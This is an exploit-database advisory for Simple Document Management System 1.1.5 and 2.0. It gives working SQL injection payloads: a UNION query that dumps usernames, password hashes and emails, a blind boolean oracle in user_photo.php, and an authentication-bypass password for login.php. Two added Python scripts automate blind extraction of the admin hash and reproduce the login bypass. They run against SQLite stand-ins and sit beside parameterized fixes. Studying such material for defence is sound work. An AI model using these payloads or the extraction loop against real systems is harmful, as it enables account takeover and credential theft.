0day.today - Biggest Exploit Database in the World.
Simple Document Management System 1.1.5 / 2.0 SQL Injection Vulnerability
Simple Document Management System 1.1.5 / 2.0 Multiple Vulnerabilities

bug found by: Jose Luis Gongora Fernandez (a.k.a. JosS)
twitter: @JossGongora
contact: sys-project[at]hotmail[dot]com
website: http://www.hack0wn.com/
download: http://mirror.us.cc.com.au/pub/cafuego/sdms

----------- version 2.0 -----------

~~ [Multiple SQL]

/list.php?folder_id=['foo]
/detail.php?doc_id=['foo]

folder_id is copied from $_GET into the query text with no cast or escaping (detail.php handles doc_id the same way). The value sits in a numeric context, so there is no quote to break out of, and $order is concatenated into the ORDER BY clause just as carelessly:

```php
// list.php, line 13:
if(isset($_GET['folder_id']))
    $folder_id = $_GET['folder_id'];
...
// list.php, line 48:
if(isset($order)) {
    $query = "SELECT id,name FROM folders WHERE parent=$folder_id ORDER BY ". rawurldecode($order);
} else {
    $query = "SELECT id,name FROM folders WHERE parent=$folder_id";
}
```

.xpl! ::

/list.php?folder_id=-10+union+all+select+1,1,1,concat_ws(char(58),user,pass,name,email),1,1,1,1,1,1,0+from+users--

A negative parent id empties the legitimate result set so only the UNION rows are rendered, and concat_ws(char(58), ...) joins user, pass, name and email with ':' so all four values land in one displayed column. The folders query quoted above selects two columns; the eleven-column UNION has to match the column count of whichever SELECT in list.php the payload actually lands in, so adjust it to the query you are hitting.

~~ [Blind]

/user_photo.php?view=[foo]

```php
$query = "SELECT photo,mime FROM users_info WHERE id=".$_GET['view'];
$res = mysql_query($query, $sql);
if( mysql_num_rows($res) == 1 ) {
    $row = mysql_fetch_array($res);
    header( "Content-type: $row[mime]" );
    echo "". base64_decode($row[photo]) ."";
} else {
    echo "Badness!\n";
}
```

The response carries only the photo bytes, but the branch on mysql_num_rows() == 1 is a one-bit oracle: an injected condition that is true returns the image, a false one returns "Badness!".

.poc! ::

/user_photo.php?view=2+and+1=1   (photo served)
/user_photo.php?view=2+and+1=2   ("Badness!")

------------- version 1.1.5 -------------

~~ [Auth Bypass]

/login.php

```php
$result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'");
$row = @mysql_fetch_array($result);
if( $row[0] != 0 ) {
    header("Location: index.php");
    exit;
}
$result = @mysql_query("SELECT id,name FROM users WHERE user='$login'");
$row = @mysql_fetch_array($result);
$id = $row[id];
$name = $row[name];
```

Both $login and $pass are interpolated unescaped, and the login succeeds whenever the first column of the first row is 0. Closing the PASSWORD('...') literal from inside $pass lets the attacker discard the real comparison and UNION in a constant 0:

.xpl! ::

user: Admin
password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users -- 

(The trailing space after -- is required: MySQL only treats -- as a comment when it is followed by whitespace.) The query that reaches MySQL is

    SELECT pass != PASSWORD('') FROM users WHERE id=-1 UNION SELECT 0 FROM users -- ') FROM users WHERE user='Admin'

The WHERE id=-1 half returns nothing, the UNION half returns a single 0, the check passes, and the second query then loads the account named in $login, so the username must exist (Admin here).

__h0__

# 0day.today [2024-07-05] #
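The two user_photo.php PoC URLs only prove that the oracle exists. The script below, added here as an example and not part of JosS's advisory or of the SDMS code, generalizes the blind PoC into boolean-based extraction of an arbitrary scalar subquery (the admin password hash) through that oracle, and places the hardened query beside the vulnerable one. It runs against an in-memory SQLite stand-in for the MySQL backend: the table and column names follow the advisory, the row contents are constructed, and MySQL's ascii() is registered as a user function so the MySQL-style payloads run unchanged. user_photo_vulnerable() mirrors the PHP branch on mysql_num_rows(); everything else (function names, the binary search, the sample data) is this example's own.

```python
import sqlite3
from typing import Callable

# Constructed stand-in for the SDMS MySQL backend (assumption for this example):
# an in-memory SQLite database whose tables and columns follow the advisory;
# the row contents are made up.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    # MySQL has ascii(); SQLite does not, so register one so the MySQL-style
    # payloads below run unchanged against the stand-in (ascii('') is 0, as in MySQL).
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.executescript("""
        CREATE TABLE users (id INTEGER, user TEXT, pass TEXT, name TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'admin', 'fakehash42', 'Admin', 'admin@example.invalid');
        CREATE TABLE users_info (id INTEGER, photo TEXT, mime TEXT);
        INSERT INTO users_info VALUES (2, 'aGVsbG8=', 'image/png');
    """)
    return conn


def user_photo_vulnerable(conn: sqlite3.Connection, view: str) -> bool:
    """Mirrors user_photo.php: $_GET['view'] is concatenated into the query and the
    script serves the photo iff exactly one row comes back. True stands for the
    image being served, False for the 'Badness!' branch: a one-bit oracle."""
    rows = conn.execute("SELECT photo,mime FROM users_info WHERE id=" + view).fetchall()
    return len(rows) == 1


def user_photo_hardened(conn: sqlite3.Connection, view: str) -> bool:
    """The fix: validate the type and bind the value instead of pasting it into SQL."""
    if not view.isdigit():
        return False
    rows = conn.execute("SELECT photo,mime FROM users_info WHERE id=?", (int(view),)).fetchall()
    return len(rows) == 1


def extract_via_oracle(oracle: Callable[[str], bool], subquery: str, max_len: int = 64) -> str:
    """Boolean-based blind extraction of a scalar subquery's result, one character
    per position, by binary-searching ascii() of that character through the oracle.
    About seven requests per character; stops when ascii() returns 0 (past the end)."""
    result = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            # id=2 is a row known to exist (the advisory's PoC uses view=2), so the
            # row count depends only on the injected comparison.
            payload = f"2 and ascii(substr(({subquery}),{pos},1))>{mid}"
            if oracle(payload):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        result += chr(lo)
    return result


def leak_admin_hash(conn: sqlite3.Connection) -> str:
    """Drive the oracle against the vulnerable endpoint to read the admin password hash."""
    return extract_via_oracle(lambda p: user_photo_vulnerable(conn, p),
                              "SELECT pass FROM users WHERE user='admin'")


if __name__ == "__main__":
    db = make_db()
    print("PoC  view=2+and+1=1 ->", user_photo_vulnerable(db, "2 and 1=1"))
    print("PoC  view=2+and+1=2 ->", user_photo_vulnerable(db, "2 and 1=2"))
    print("leaked hash        ->", leak_admin_hash(db))
    print("hardened, injected ->", user_photo_hardened(db, "2 and 1=1"))
```

Against the real target the oracle would be an HTTP request that returns True when the response is an image and False when the body is "Badness!"; the extraction loop is unchanged. Binary search over the character value is what keeps the request count near seven per character instead of up to 127.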
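To make the login.php bypass concrete, the script below (an added example, not the advisory's or SDMS's code) composes the exact query the PHP sends for the advisory's username/password pair, runs it against an in-memory SQLite stand-in for the MySQL backend, and contrasts it with a parameterized, constant-time comparison. The stand-in is an assumption: SQLite has no PASSWORD(), so a SHA-1 hex digest is registered under that name (the real MySQL function hashes differently, but the bypass depends only on the shape of the query, not on the hash), and the users row is constructed. login_vulnerable() mirrors the PHP control flow; the other names are this example's own.

```python
import hashlib
import hmac
import sqlite3
from typing import Optional, Tuple

# The advisory's payload, verbatim (the trailing space after -- matters in MySQL).
BYPASS_PASSWORD = "') FROM users WHERE id=-1 UNION SELECT 0 FROM users -- "


# Constructed stand-in for the SDMS 1.1.5 MySQL backend (assumption for this example).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    # SQLite lacks PASSWORD(); SHA-1 hex stands in for it here.
    conn.create_function("PASSWORD", 1, lambda p: hashlib.sha1(p.encode()).hexdigest())
    conn.execute("CREATE TABLE users (id INTEGER, user TEXT, pass TEXT, name TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'Admin', PASSWORD('correct horse'), 'Administrator')")
    return conn


def build_check_query(login: str, pw: str) -> str:
    """The string login.php actually sends: both fields pasted into the SQL text."""
    return f"SELECT pass != PASSWORD('{pw}') FROM users WHERE user='{login}'"


def login_vulnerable(conn: sqlite3.Connection, login: str, pw: str) -> Optional[Tuple[int, str]]:
    """Mirrors login.php: proceed unless the first column of the first row is
    non-zero, then look the user up again by name. (PHP's loose comparison on an
    empty result is not reproduced; an empty result is treated as a failed login.)"""
    row = conn.execute(build_check_query(login, pw)).fetchone()
    if row is None or row[0] != 0:
        return None
    row = conn.execute(f"SELECT id,name FROM users WHERE user='{login}'").fetchone()
    return (row[0], row[1]) if row else None


def login_hardened(conn: sqlite3.Connection, login: str, pw: str) -> Optional[Tuple[int, str]]:
    """The fix: bind parameters so input never reaches the SQL text, fetch the stored
    hash, and compare it in constant time. The stand-in SHA-1 is kept so the two
    versions are comparable; real code should use a slow password hash (bcrypt, argon2)."""
    row = conn.execute("SELECT id,name,pass FROM users WHERE user=?", (login,)).fetchone()
    if row is None:
        return None
    candidate = hashlib.sha1(pw.encode()).hexdigest()
    if not hmac.compare_digest(candidate, row[2]):
        return None
    return (row[0], row[1])


if __name__ == "__main__":
    db = make_db()
    print(build_check_query("Admin", BYPASS_PASSWORD))
    print("vulnerable, payload ->", login_vulnerable(db, "Admin", BYPASS_PASSWORD))
    print("vulnerable, wrong   ->", login_vulnerable(db, "Admin", "wrong"))
    print("hardened, payload   ->", login_hardened(db, "Admin", BYPASS_PASSWORD))
    print("hardened, correct   ->", login_hardened(db, "Admin", "correct horse"))
```

The printed query shows why the username still has to be real: the injected comment discards the original WHERE user='Admin' from the first statement, but the second statement is built from $login unchanged, so a non-existent name yields no account to load. In the hardened version the same payload is just a (wrong) password string, because it is bound as a parameter rather than parsed as SQL.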